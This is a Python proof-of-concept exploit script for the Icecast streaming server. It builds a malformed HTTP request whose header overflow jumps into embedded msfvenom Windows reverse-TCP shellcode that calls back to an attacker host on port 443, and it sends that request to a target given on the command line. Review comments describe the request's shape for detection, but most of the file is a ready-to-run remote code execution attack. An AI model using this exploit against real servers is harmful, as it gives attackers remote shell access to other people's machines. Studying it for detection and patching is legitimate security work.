POC / icecast.py PY
#!/usr/bin/env python3
##############################################################################################
# How to use:
# 1. Replace 'buf' shellcode below with msfvenom shellcode
# 2. Call it like this: ./icecast.py <target> <port>
# Eg. root@Kali:~# ./icecast.py 192.168.92.133 8000
##############################################################################################
import socket
import sys

# Target address and TCP port are taken straight from the command line.
# Nothing is validated here: a missing argument raises IndexError and a
# non-numeric port raises ValueError.
host, port = sys.argv[1], int(sys.argv[2])

# Payload bytes, held as a str of \xNN escapes (one code point per byte).
# Replace with own shellcode here; the sample below corresponds to the
# msfvenom command on the next comment line: an x86 Windows reverse-TCP shell
# for LHOST 192.168.92.128 / LPORT 443, generated with -b so that the bytes
# 0x00, 0x0a and 0x0d never occur in it.
# NOTE(review): presumably NUL, LF and CR are excluded because they would end
# the request line early in the target's parser -- confirm.
# The usage header says to replace this blob per run, so these exact bytes
# are not a stable indicator; detection should key on the shape of the request
# that carries them rather than on the blob itself.
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.92.128 LPORT=443 -f python -b '\x00\x0a\x0d'

buf =  ""
buf += "\xd9\xc5\xd9\x74\x24\xf4\xba\xc4\x81\xbb\x95\x5e\x31"
buf += "\xc9\xb1\x52\x31\x56\x17\x03\x56\x17\x83\x2a\x7d\x59"
buf += "\x60\x4e\x96\x1c\x8b\xae\x67\x41\x05\x4b\x56\x41\x71"
buf += "\x18\xc9\x71\xf1\x4c\xe6\xfa\x57\x64\x7d\x8e\x7f\x8b"
buf += "\x36\x25\xa6\xa2\xc7\x16\x9a\xa5\x4b\x65\xcf\x05\x75"
buf += "\xa6\x02\x44\xb2\xdb\xef\x14\x6b\x97\x42\x88\x18\xed"
buf += "\x5e\x23\x52\xe3\xe6\xd0\x23\x02\xc6\x47\x3f\x5d\xc8"
buf += "\x66\xec\xd5\x41\x70\xf1\xd0\x18\x0b\xc1\xaf\x9a\xdd"
buf += "\x1b\x4f\x30\x20\x94\xa2\x48\x65\x13\x5d\x3f\x9f\x67"
buf += "\xe0\x38\x64\x15\x3e\xcc\x7e\xbd\xb5\x76\x5a\x3f\x19"
buf += "\xe0\x29\x33\xd6\x66\x75\x50\xe9\xab\x0e\x6c\x62\x4a"
buf += "\xc0\xe4\x30\x69\xc4\xad\xe3\x10\x5d\x08\x45\x2c\xbd"
buf += "\xf3\x3a\x88\xb6\x1e\x2e\xa1\x95\x76\x83\x88\x25\x87"
buf += "\x8b\x9b\x56\xb5\x14\x30\xf0\xf5\xdd\x9e\x07\xf9\xf7"
buf += "\x67\x97\x04\xf8\x97\xbe\xc2\xac\xc7\xa8\xe3\xcc\x83"
buf += "\x28\x0b\x19\x03\x78\xa3\xf2\xe4\x28\x03\xa3\x8c\x22"
buf += "\x8c\x9c\xad\x4d\x46\xb5\x44\xb4\x01\x7a\x30\xea\x51"
buf += "\x12\x43\x12\x53\x58\xca\xf4\x39\x8e\x9b\xaf\xd5\x37"
buf += "\x86\x3b\x47\xb7\x1c\x46\x47\x33\x93\xb7\x06\xb4\xde"
buf += "\xab\xff\x34\x95\x91\x56\x4a\x03\xbd\x35\xd9\xc8\x3d"
buf += "\x33\xc2\x46\x6a\x14\x34\x9f\xfe\x88\x6f\x09\x1c\x51"
buf += "\xe9\x72\xa4\x8e\xca\x7d\x25\x42\x76\x5a\x35\x9a\x77"
buf += "\xe6\x61\x72\x2e\xb0\xdf\x34\x98\x72\x89\xee\x77\xdd"
buf += "\x5d\x76\xb4\xde\x1b\x77\x91\xa8\xc3\xc6\x4c\xed\xfc"
buf += "\xe7\x18\xf9\x85\x15\xb9\x06\x5c\x9e\xc9\x4c\xfc\xb7"
buf += "\x41\x09\x95\x85\x0f\xaa\x40\xc9\x29\x29\x60\xb2\xcd"
buf += "\x31\x01\xb7\x8a\xf5\xfa\xc5\x83\x93\xfc\x7a\xa3\xb1"

# Assemble the raw request text in wire order. What a sensor or proxy sees:
#   * the method position holds the two bytes EB 0C, not a printable HTTP verb
#     (EB 0C is the x86 encoding of a 12-byte short jump, and ' / HTTP/1.1 '
#     is 12 characters long);
#   * the request line continues with binary data after the version token;
#   * the same 'Accept: text/html' header repeats 31 times;
#   * a 32nd header line follows that has no colon and holds four raw bytes.
# NOTE(review): presumably the target keeps header lines in a fixed number of
# slots and the 32nd line lands past them -- confirm against the advisory.
# A server or front end that caps the header count and rejects a non-token
# method would refuse this request.
evul = "".join((
    "\xeb\x0c",
    " / HTTP/1.1 ",
    buf,
    "\r\n",
    "Accept: text/html\r\n" * 31,
    "\xff\x64\x24\x04",  # jmp [esp+4]
    "\r\n\r\n",
))

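# Open one TCP connection, write the request once, and close the socket.
# The `with` block closes the socket even when connect() or sendall() raises;
# the original leaked the descriptor on that path.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
    client.connect((host, port))
    # latin-1 maps code points 0-255 to the same byte values, so each \xNN
    # escape in evul goes out as exactly one byte (UTF-8 would expand every
    # value above 0x7f to two bytes).
    client.sendall(evul.encode('latin-1'))

# Printed once sendall() has returned. No response is read, so this message
# only means the bytes were handed to the socket, not that the target reacted.
print("\nDone!")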